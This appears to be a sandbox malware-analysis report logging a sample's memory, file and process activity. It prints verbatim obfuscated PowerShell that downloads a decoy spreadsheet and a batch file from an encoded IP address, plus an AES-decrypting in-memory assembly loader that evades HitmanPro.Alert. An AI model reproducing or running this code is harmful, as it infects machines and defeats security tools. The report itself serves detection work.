NtProtectVirtualMemory May 9, 2024, 10:59 a.m.	process_identifier: 2644 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8192 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x717e2000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 9, 2024, 10:59 a.m.	process_identifier: 2644 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02012000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 9, 2024, 10:59 a.m.	process_identifier: 2644 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02022000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 9, 2024, 10:59 a.m.	process_identifier: 2644 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b11000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 9, 2024, 10:59 a.m.	process_identifier: 2644 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b12000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 9, 2024, 10:59 a.m.	process_identifier: 2644 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0265a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 9, 2024, 10:59 a.m.	process_identifier: 2644 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02023000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 9, 2024, 10:59 a.m.	process_identifier: 2644 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02024000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 9, 2024, 10:59 a.m.	process_identifier: 2644 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026eb000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 9, 2024, 10:59 a.m.	process_identifier: 2644 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026e7000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 9, 2024, 10:59 a.m.	process_identifier: 2644 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0201b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 9, 2024, 10:59 a.m.	process_identifier: 2644 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02652000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 9, 2024, 10:59 a.m.	process_identifier: 2644 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026e5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 9, 2024, 10:59 a.m.	process_identifier: 2644 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02025000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 9, 2024, 10:59 a.m.	process_identifier: 2644 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0265c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 9, 2024, 10:59 a.m.	process_identifier: 2644 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b00000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 9, 2024, 10:59 a.m.	process_identifier: 2644 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02026000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 9, 2024, 10:59 a.m.	process_identifier: 2644 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026ec000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 9, 2024, 10:59 a.m.	process_identifier: 2644 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02653000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 9, 2024, 10:59 a.m.	process_identifier: 2644 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02654000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 9, 2024, 10:59 a.m.	process_identifier: 2644 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02655000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 9, 2024, 10:59 a.m.	process_identifier: 2644 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02656000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 9, 2024, 10:59 a.m.	process_identifier: 2644 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02657000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 9, 2024, 10:59 a.m.	process_identifier: 2644 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02658000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 9, 2024, 10:59 a.m.	process_identifier: 2644 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02659000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 9, 2024, 10:59 a.m.	process_identifier: 2644 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02ba0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 9, 2024, 10:59 a.m.	process_identifier: 2644 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02ba1000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 9, 2024, 10:59 a.m.	process_identifier: 2644 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02ba2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 9, 2024, 10:59 a.m.	process_identifier: 2644 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02ba3000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 9, 2024, 10:59 a.m.	process_identifier: 2644 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02ba4000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 9, 2024, 10:59 a.m.	process_identifier: 2644 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02ba5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 9, 2024, 10:59 a.m.	process_identifier: 2644 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02ba6000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 9, 2024, 10:59 a.m.	process_identifier: 2644 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02ba7000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 9, 2024, 10:59 a.m.	process_identifier: 2644 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02ba8000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 9, 2024, 10:59 a.m.	process_identifier: 2644 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02ba9000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 9, 2024, 10:59 a.m.	process_identifier: 2644 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02baa000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 9, 2024, 10:59 a.m.	process_identifier: 2644 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02bab000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 9, 2024, 10:59 a.m.	process_identifier: 2644 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02bac000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 9, 2024, 10:59 a.m.	process_identifier: 2644 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02bad000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 9, 2024, 10:59 a.m.	process_identifier: 2644 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02bae000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 9, 2024, 10:59 a.m.	process_identifier: 2644 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02baf000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 9, 2024, 10:59 a.m.	process_identifier: 2644 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02bf0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 9, 2024, 10:59 a.m.	process_identifier: 2644 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02bf1000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 9, 2024, 10:59 a.m.	process_identifier: 2644 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02bf2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 9, 2024, 10:59 a.m.	process_identifier: 2644 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02bf3000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

Creates (office) documents on the filesystem (2 events)

file	C:\Users\test22\AppData\Roaming\Excel.xlsx
file	C:\Users\test22\AppData\Roaming\~$Excel.xlsx

Creates executable files on the filesystem (3 events)

file	C:\Users\test22\AppData\Roaming\xx.bat
file	C:\Users\test22\AppData\Roaming\Microsoft\Office\Recent\Roaming.LNK
file	C:\Users\test22\AppData\Roaming\Microsoft\Office\Recent\Excel.xlsx.LNK

Creates hidden or system file (3 events)

Time & API	Arguments	Status	Return
NtCreateFile May 9, 2024, 10:59 a.m.	create_disposition: 2 (FILE_CREATE) file_handle: 0x00000438 filepath: C:\Users\test22\AppData\Roaming\~$Excel.xlsx desired_access: 0xc0110080 (FILE_READ_ATTRIBUTES\|DELETE\|SYNCHRONIZE\|GENERIC_WRITE) file_attributes: 2 (FILE_ATTRIBUTE_HIDDEN) filepath_r: \??\C:\Users\test22\AppData\Roaming\~$Excel.xlsx create_options: 4198496 (FILE_NON_DIRECTORY_FILE\|FILE_SYNCHRONOUS_IO_NONALERT\|FILE_DELETE_ON_CLOSE) status_info: 2 (FILE_CREATED) share_access: 1 (FILE_SHARE_READ)	1	0
SetFileAttributesW May 9, 2024, 10:59 a.m.	file_attributes: 2 (FILE_ATTRIBUTE_HIDDEN) filepath_r: C:\Users\test22\AppData\Roaming\Microsoft\Office\Recent\index.dat filepath: C:\Users\test22\AppData\Roaming\Microsoft\Office\Recent\index.dat	1	1
SetFileAttributesW May 9, 2024, 10:59 a.m.	file_attributes: 2 (FILE_ATTRIBUTE_HIDDEN) filepath_r: C:\Users\test22\AppData\Roaming\Microsoft\Office\Recent\index.dat filepath: C:\Users\test22\AppData\Roaming\Microsoft\Office\Recent\index.dat	1	1

Creates a shortcut to an executable file (3 events)

file	C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk
file	C:\Users\test22\AppData\Roaming\Microsoft\Office\Recent\Roaming.LNK
file	C:\Users\test22\AppData\Roaming\Microsoft\Office\Recent\Excel.xlsx.LNK

Creates a suspicious process (5 events)

cmdline	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function oYYtmcfgNVALjZ($AMoNCQYGRgLRoU, $yowkcxYklFDKtli){[IO.File]::WriteAllBytes($AMoNCQYGRgLRoU, $yowkcxYklFDKtli)};function oocZbSbPqugD($AMoNCQYGRgLRoU){if($AMoNCQYGRgLRoU.EndsWith((iGrhVnKiZYQ @(59818,59872,59880,59880))) -eq $True){rundll32.exe $AMoNCQYGRgLRoU }elseif($AMoNCQYGRgLRoU.EndsWith((iGrhVnKiZYQ @(59818,59884,59887,59821))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $AMoNCQYGRgLRoU}elseif($AMoNCQYGRgLRoU.EndsWith((iGrhVnKiZYQ @(59818,59881,59887,59877))) -eq $True){misexec /qn /i $AMoNCQYGRgLRoU}else{Start-Process $AMoNCQYGRgLRoU}};function jlAPajKrXnXds($irMBWZFpvuqduX){$hWiCJPXtnbCAfgDIPKdzz = New-Object (iGrhVnKiZYQ @(59850,59873,59888,59818,59859,59873,59870,59839,59880,59877,59873,59882,59888));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$yowkcxYklFDKtli = $hWiCJPXtnbCAfgDIPKdzz.DownloadData($irMBWZFpvuqduX);return $yowkcxYklFDKtli};function iGrhVnKiZYQ($eaILzSbnqJ){$lgMdU=59772;$pkNOUpDlz=$Null;foreach($WtZmnegAvYDwZrJ in $eaILzSbnqJ){$pkNOUpDlz+=[char]($WtZmnegAvYDwZrJ-$lgMdU)};return $pkNOUpDlz};function wwFwRQUTDiTf(){$wPeJapJpGtoAMd = $env:AppData + '\';$ZxSzqAOPdWfCSvt = $wPeJapJpGtoAMd + 'Excel.xlsx';If(Test-Path -Path $ZxSzqAOPdWfCSvt){Invoke-Item $ZxSzqAOPdWfCSvt;}Else{ $VbnfWkgMtzU = jlAPajKrXnXds (iGrhVnKiZYQ @(59876,59888,59888,59884,59830,59819,59819,59821,59829,59823,59818,59822,59822,59822,59818,59829,59826,59818,59821,59824,59823,59830,59827,59822,59828,59827,59819,59841,59892,59871,59873,59880,59818,59892,59880,59887,59892));oYYtmcfgNVALjZ $ZxSzqAOPdWfCSvt $VbnfWkgMtzU;Invoke-Item $ZxSzqAOPdWfCSvt;};$qQjgFPGszJBcNb = $wPeJapJpGtoAMd + 'xx.bat'; if (Test-Path -Path $qQjgFPGszJBcNb){oocZbSbPqugD $qQjgFPGszJBcNb;}Else{ $aiJbTZVrclHZrx = jlAPajKrXnXds (iGrhVnKiZYQ @(59876,59888,59888,59884,59830,59819,59819,59821,59829,59823,59818,59822,59822,59822,59818,59829,59826,59818,59821,59824,59823,59830,59827,59822,59828,59827,59819,59892,59892,59818,59870,59869,59888));oYYtmcfgNVALjZ $qQjgFPGszJBcNb $aiJbTZVrclHZrx;oocZbSbPqugD $qQjgFPGszJBcNb;};;;;}wwFwRQUTDiTf;
cmdline	powershell.exe -ExecutionPolicy UnRestricted function oYYtmcfgNVALjZ($AMoNCQYGRgLRoU, $yowkcxYklFDKtli){[IO.File]::WriteAllBytes($AMoNCQYGRgLRoU, $yowkcxYklFDKtli)};function oocZbSbPqugD($AMoNCQYGRgLRoU){if($AMoNCQYGRgLRoU.EndsWith((iGrhVnKiZYQ @(59818,59872,59880,59880))) -eq $True){rundll32.exe $AMoNCQYGRgLRoU }elseif($AMoNCQYGRgLRoU.EndsWith((iGrhVnKiZYQ @(59818,59884,59887,59821))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $AMoNCQYGRgLRoU}elseif($AMoNCQYGRgLRoU.EndsWith((iGrhVnKiZYQ @(59818,59881,59887,59877))) -eq $True){misexec /qn /i $AMoNCQYGRgLRoU}else{Start-Process $AMoNCQYGRgLRoU}};function jlAPajKrXnXds($irMBWZFpvuqduX){$hWiCJPXtnbCAfgDIPKdzz = New-Object (iGrhVnKiZYQ @(59850,59873,59888,59818,59859,59873,59870,59839,59880,59877,59873,59882,59888));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$yowkcxYklFDKtli = $hWiCJPXtnbCAfgDIPKdzz.DownloadData($irMBWZFpvuqduX);return $yowkcxYklFDKtli};function iGrhVnKiZYQ($eaILzSbnqJ){$lgMdU=59772;$pkNOUpDlz=$Null;foreach($WtZmnegAvYDwZrJ in $eaILzSbnqJ){$pkNOUpDlz+=[char]($WtZmnegAvYDwZrJ-$lgMdU)};return $pkNOUpDlz};function wwFwRQUTDiTf(){$wPeJapJpGtoAMd = $env:AppData + '\';$ZxSzqAOPdWfCSvt = $wPeJapJpGtoAMd + 'Excel.xlsx';If(Test-Path -Path $ZxSzqAOPdWfCSvt){Invoke-Item $ZxSzqAOPdWfCSvt;}Else{ $VbnfWkgMtzU = jlAPajKrXnXds (iGrhVnKiZYQ @(59876,59888,59888,59884,59830,59819,59819,59821,59829,59823,59818,59822,59822,59822,59818,59829,59826,59818,59821,59824,59823,59830,59827,59822,59828,59827,59819,59841,59892,59871,59873,59880,59818,59892,59880,59887,59892));oYYtmcfgNVALjZ $ZxSzqAOPdWfCSvt $VbnfWkgMtzU;Invoke-Item $ZxSzqAOPdWfCSvt;};$qQjgFPGszJBcNb = $wPeJapJpGtoAMd + 'xx.bat'; if (Test-Path -Path $qQjgFPGszJBcNb){oocZbSbPqugD $qQjgFPGszJBcNb;}Else{ $aiJbTZVrclHZrx = jlAPajKrXnXds (iGrhVnKiZYQ @(59876,59888,59888,59884,59830,59819,59819,59821,59829,59823,59818,59822,59822,59822,59818,59829,59826,59818,59821,59824,59823,59830,59827,59822,59828,59827,59819,59892,59892,59818,59870,59869,59888));oYYtmcfgNVALjZ $qQjgFPGszJBcNb $aiJbTZVrclHZrx;oocZbSbPqugD $qQjgFPGszJBcNb;};;;;}wwFwRQUTDiTf;
cmdline	C:\Windows\system32\cmd.exe /K "C:\Users\test22\AppData\Roaming\xx.bat"
cmdline	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
cmdline	C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\test22\AppData\Roaming\xx.bat';$BMbC='RsHpUesHpUadLsHpUinsHpUesHpUssHpU'.Replace('sHpU', ''),'CCFZsreCFZsatCFZseDCFZsecCFZsrCFZsyCFZspCFZstCFZsorCFZs'.Replace('CFZs', ''),'FrBDpromBDprBBDpraBDprseBDpr6BDpr4SBDprtrBDpriBDprngBDpr'.Replace('BDpr', ''),'ChAmxTanAmxTgAmxTeEAmxTxtAmxTensAmxTiAmxTonAmxT'.Replace('AmxT', ''),'DMtvCecMtvComMtvCprMtvCeMtvCsMtvCsMtvC'.Replace('MtvC', ''),'LCapfoaCapfdCapf'.Replace('Capf', ''),'ISAmunSAmuvokSAmueSAmu'.Replace('SAmu', ''),'MawqArinMwqArowqArduwqArlewqAr'.Replace('wqAr', ''),'GetKwgmCuKwgmrreKwgmntKwgmPKwgmrocKwgmessKwgm'.Replace('Kwgm', ''),'SplMBlVitMBlV'.Replace('MBlV', ''),'ElayXCemayXCeayXCnayXCtayXCAtayXC'.Replace('ayXC', ''),'TVQktranVQktsVQktforVQktmFiVQktnaVQktlVQktBVQktloVQktcVQktkVQkt'.Replace('VQkt', ''),'EnXNnYtXNnYrXNnYyPoXNnYintXNnY'.Replace('XNnY', ''),'ComQwwpyTmQwwomQww'.Replace('mQww', '');powershell -w hidden;$modules=[System.Diagnostics.Process]::($BMbC[8])().Modules;if ($modules -match 'hmpalert.dll') { exit; };function zlGLC($RSWKX){$GVeOl=[System.Security.Cryptography.Aes]::Create();$GVeOl.Mode=[System.Security.Cryptography.CipherMode]::CBC;$GVeOl.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$GVeOl.Key=[System.Convert]::($BMbC[2])('uY6F5j209xASZjaoUU93vCCXVRY+Y6fGH5LCH0uNzYo=');$GVeOl.IV=[System.Convert]::($BMbC[2])('iwvv8vpAhw35q7w8nU7OXw==');$QznTD=$GVeOl.($BMbC[1])();$RHHCU=$QznTD.($BMbC[11])($RSWKX,0,$RSWKX.Length);$QznTD.Dispose();$GVeOl.Dispose();$RHHCU;}function lfrrO($RSWKX){$kKatK=New-Object System.IO.MemoryStream(,$RSWKX);$EyOwi=New-Object System.IO.MemoryStream;$oJtRR=New-Object System.IO.Compression.GZipStream($kKatK,[IO.Compression.CompressionMode]::($BMbC[4]));$oJtRR.($BMbC[13])($EyOwi);$oJtRR.Dispose();$kKatK.Dispose();$EyOwi.Dispose();$EyOwi.ToArray();}$FYWBz=[System.IO.File]::($BMbC[0])([Console]::Title);$QpMEc=lfrrO (zlGLC ([Convert]::($BMbC[2])([System.Linq.Enumerable]::($BMbC[10])($FYWBz, 5).Substring(2))));$IyoFy=lfrrO (zlGLC ([Convert]::($BMbC[2])([System.Linq.Enumerable]::($BMbC[10])($FYWBz, 6).Substring(2))));[System.Reflection.Assembly]::($BMbC[5])([byte[]]$IyoFy).($BMbC[12]).($BMbC[6])($null,$null);[System.Reflection.Assembly]::($BMbC[5])([byte[]]$QpMEc).($BMbC[12]).($BMbC[6])($null,$null); "

A process created a hidden window (1 event)

Time & API	Arguments	Status	Return	Repeated
ShellExecuteExW May 9, 2024, 10:59 a.m.	show_type: 0 filepath_r: powershell.exe parameters: -ExecutionPolicy UnRestricted function oYYtmcfgNVALjZ($AMoNCQYGRgLRoU, $yowkcxYklFDKtli){[IO.File]::WriteAllBytes($AMoNCQYGRgLRoU, $yowkcxYklFDKtli)};function oocZbSbPqugD($AMoNCQYGRgLRoU){if($AMoNCQYGRgLRoU.EndsWith((iGrhVnKiZYQ @(59818,59872,59880,59880))) -eq $True){rundll32.exe $AMoNCQYGRgLRoU }elseif($AMoNCQYGRgLRoU.EndsWith((iGrhVnKiZYQ @(59818,59884,59887,59821))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $AMoNCQYGRgLRoU}elseif($AMoNCQYGRgLRoU.EndsWith((iGrhVnKiZYQ @(59818,59881,59887,59877))) -eq $True){misexec /qn /i $AMoNCQYGRgLRoU}else{Start-Process $AMoNCQYGRgLRoU}};function jlAPajKrXnXds($irMBWZFpvuqduX){$hWiCJPXtnbCAfgDIPKdzz = New-Object (iGrhVnKiZYQ @(59850,59873,59888,59818,59859,59873,59870,59839,59880,59877,59873,59882,59888));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$yowkcxYklFDKtli = $hWiCJPXtnbCAfgDIPKdzz.DownloadData($irMBWZFpvuqduX);return $yowkcxYklFDKtli};function iGrhVnKiZYQ($eaILzSbnqJ){$lgMdU=59772;$pkNOUpDlz=$Null;foreach($WtZmnegAvYDwZrJ in $eaILzSbnqJ){$pkNOUpDlz+=[char]($WtZmnegAvYDwZrJ-$lgMdU)};return $pkNOUpDlz};function wwFwRQUTDiTf(){$wPeJapJpGtoAMd = $env:AppData + '\';$ZxSzqAOPdWfCSvt = $wPeJapJpGtoAMd + 'Excel.xlsx';If(Test-Path -Path $ZxSzqAOPdWfCSvt){Invoke-Item $ZxSzqAOPdWfCSvt;}Else{ $VbnfWkgMtzU = jlAPajKrXnXds (iGrhVnKiZYQ @(59876,59888,59888,59884,59830,59819,59819,59821,59829,59823,59818,59822,59822,59822,59818,59829,59826,59818,59821,59824,59823,59830,59827,59822,59828,59827,59819,59841,59892,59871,59873,59880,59818,59892,59880,59887,59892));oYYtmcfgNVALjZ $ZxSzqAOPdWfCSvt $VbnfWkgMtzU;Invoke-Item $ZxSzqAOPdWfCSvt;};$qQjgFPGszJBcNb = $wPeJapJpGtoAMd + 'xx.bat'; if (Test-Path -Path $qQjgFPGszJBcNb){oocZbSbPqugD $qQjgFPGszJBcNb;}Else{ $aiJbTZVrclHZrx = jlAPajKrXnXds (iGrhVnKiZYQ @(59876,59888,59888,59884,59830,59819,59819,59821,59829,59823,59818,59822,59822,59822,59818,59829,59826,59818,59821,59824,59823,59830,59827,59822,59828,59827,59819,59892,59892,59818,59870,59869,59888));oYYtmcfgNVALjZ $qQjgFPGszJBcNb $aiJbTZVrclHZrx;oocZbSbPqugD $qQjgFPGszJBcNb;};;;;}wwFwRQUTDiTf; filepath: powershell.exe	1	1	0

Changes read-write memory protection to read-execute (probably to avoid detection when setting all RWX flags at the same time) (1 event)

Time & API	Arguments	Status	Return	Repeated
NtProtectVirtualMemory May 9, 2024, 10:59 a.m.	process_identifier: 2552 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 32 (PAGE_EXECUTE_READ) base_address: 0x7ef80000 process_handle: 0xffffffff	1	0	0

Checks adapter addresses which can be used to detect virtual network interfaces (1 event)

Time & API	Arguments	Status	Return	Repeated
GetAdaptersAddresses May 9, 2024, 10:59 a.m.	flags: 15 family: 0		111	0

URL downloaded by powershell script (9 events)

Data received	HTTP/1.1 200 OK
